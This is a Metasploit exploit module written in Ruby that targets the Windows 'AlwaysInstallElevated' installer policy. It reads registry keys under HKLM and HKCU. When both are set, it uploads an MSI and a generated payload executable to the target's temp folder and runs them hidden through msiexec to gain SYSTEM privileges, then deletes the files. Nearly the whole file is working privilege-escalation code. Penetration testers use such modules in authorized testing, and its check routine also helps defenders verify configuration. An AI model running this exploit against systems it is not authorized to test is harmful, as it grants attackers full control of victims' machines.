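##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/windows/registry'

# Local check/exploit module for the Windows Installer "AlwaysInstallElevated"
# policy. +check+ reports Vulnerable only when the policy value is present and
# non-zero under BOTH HKLM and HKCU; a missing value or a value of 0 under either
# hive is reported as Safe, which is the configuration a defender wants to verify.
#
# Fixes versus the previous revision:
# - a stray `s` token after +initialize+ made the class fail to load;
# - +cleanup+ no longer calls delete with a nil path when +exploit+ aborted
#   before +@payload_destination+ was assigned;
# - the payload file handle is closed in an +ensure+ so a failed write does
#   not leak it.
class Metasploit3 < Msf::Exploit::Local
  Rank = AverageRanking

  include Msf::Exploit::EXE
  include Msf::Post::Windows::Registry

  # Registry value and policy key inspected by +check+.
  INSTALL_ELEVATED = "AlwaysInstallElevated"
  INSTALLER_KEY = "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer"
  HKCU_INSTALLER = "HKEY_CURRENT_USER\\#{INSTALLER_KEY}"
  HKLM_INSTALLER = "HKEY_LOCAL_MACHINE\\#{INSTALLER_KEY}"

  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'Windows AlwaysInstallElevated MSI',
      'Description'    => %q{
        This module checks the AlwaysInstallElevated registry keys which dictate if
        .MSI files should be installed with elevated privileges (NT AUTHORITY\SYSTEM).
        The default MSI file is data/post/exec_payload.msi with the WiX source file
        under data/post/exec_payload_source/. This MSI simply executes payload.exe
        within the same folder. The MSI may not execute succesfully successive times.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Ben Campbell',
          'Parvez Anwar' # discovery
        ],
      'Arch'           => [ ARCH_X86, ARCH_X86_64 ],
      'Platform'       => [ 'win' ],
      'SessionTypes'   => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          'WfsDelay' => 10,
          'EXITFUNC' => 'thread',
        },
      'Targets'        =>
        [
          [ 'Windows', { } ],
        ],
      'References'     =>
        [
          [ 'URL', 'http://www.greyhathacker.net/?p=185' ],
          [ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ],
          [ 'URL', 'http://wix.sourceforge.net' ],
        ],
      'DisclosureDate' => 'Mar 18 2010',
      'DefaultTarget'  => 0
    }))

    register_advanced_options([
      OptString.new('LOG_FILE', [false, 'Path to output MSI log file to.', nil]),
    ], self.class)
  end

  # Evaluates the AlwaysInstallElevated policy on the target.
  #
  # HKLM is read first; HKCU is only read when HKLM is present and non-zero,
  # so the printed messages follow the same order as before.
  #
  # @return [Msf::Exploit::CheckCode] Vulnerable only when both hives hold a
  #   non-zero value, Safe otherwise.
  def check
    return Msf::Exploit::CheckCode::Safe unless install_elevated_set?(HKLM_INSTALLER)
    return Msf::Exploit::CheckCode::Safe unless install_elevated_set?(HKCU_INSTALLER)

    Msf::Exploit::CheckCode::Vulnerable
  end

  # Removes the files +exploit+ uploaded. Each path is handled independently
  # and skipped when it was never assigned, so an upload failure part-way
  # through +exploit+ no longer causes a delete with a nil path.
  def cleanup
    return unless @executed

    delete_remote_file("MSI", @msi_destination)
    delete_remote_file("Payload", @payload_destination)
  end

  # Uploads the bundled MSI and the generated payload executable to the
  # session's %TEMP% directory and runs the MSI through msiexec.
  # +@executed+ is set before the uploads begin so +cleanup+ can remove
  # whatever was uploaded if a later step raises.
  def exploit
    @executed = false
    return unless check == Msf::Exploit::CheckCode::Vulnerable

    @executed = true
    # Random 6..13 character basename for the uploaded MSI.
    msi_filename = Rex::Text.rand_text_alpha(rand(8) + 6) + ".msi"
    msi_source = ::File.join(Msf::Config.install_root, "data", "post", "exec_payload.msi")
    temp_dir = session.fs.file.expand_path("%TEMP%")

    # Upload MSI
    @msi_destination = "#{temp_dir}\\#{msi_filename}"
    print_status("Uploading the MSI to #{@msi_destination} ...")
    session.fs.file.upload_file(@msi_destination, msi_source)

    # Upload payload; the MSI expects it as payload.exe in the same folder.
    payload = generate_payload_exe
    @payload_destination = "#{temp_dir}\\payload.exe"
    print_status("Uploading the Payload to #{@payload_destination} ...")
    fd = client.fs.file.new(@payload_destination, "wb")
    begin
      fd.write(payload)
    ensure
      fd.close
    end

    # Execute MSI
    print_status("Executing MSI...")
    # NOTE(review): LOG_FILE is interpolated into the command line unquoted;
    # a path containing spaces is unlikely to survive msiexec's argument
    # parsing — confirm before relying on this option.
    logging = datastore['LOG_FILE'].nil? ? "" : "/l* #{datastore['LOG_FILE']} "
    cmd = "msiexec.exe #{logging}/quiet /passive /n /package #{@msi_destination}"
    vprint_status(cmd)
    session.sys.process.execute(cmd, nil, {'Hidden' => true})
    # No fds and a 5s timeout: pauses for 5 seconds before returning.
    select(nil, nil, nil, 5)
  end

  private

  # Reads AlwaysInstallElevated under +hive_key+ and reports the result.
  #
  # @param hive_key [String] full registry key path including the hive.
  # @return [Boolean] true when the value exists and is non-zero.
  def install_elevated_set?(hive_key)
    value = registry_getvaldata(hive_key, INSTALL_ELEVATED)
    if value.nil?
      print_error("#{hive_key}\\#{INSTALL_ELEVATED} does not exist or is not accessible.")
      false
    elsif value == 0
      print_error("#{hive_key}\\#{INSTALL_ELEVATED} is #{value}.")
      false
    else
      print_good("#{hive_key}\\#{INSTALL_ELEVATED} is #{value}.")
      true
    end
  end

  # Deletes +path+ on the session, reporting (not raising) a Meterpreter
  # request failure. Does nothing when +path+ is nil.
  #
  # @param label [String] name used in the status message.
  # @param path [String, nil] remote file path, or nil if never uploaded.
  def delete_remote_file(label, path)
    return if path.nil?

    print_status("Deleting #{label}...")
    session.fs.file.delete(path)
  rescue Rex::Post::Meterpreter::RequestError => e
    print_error(e.to_s)
  end
end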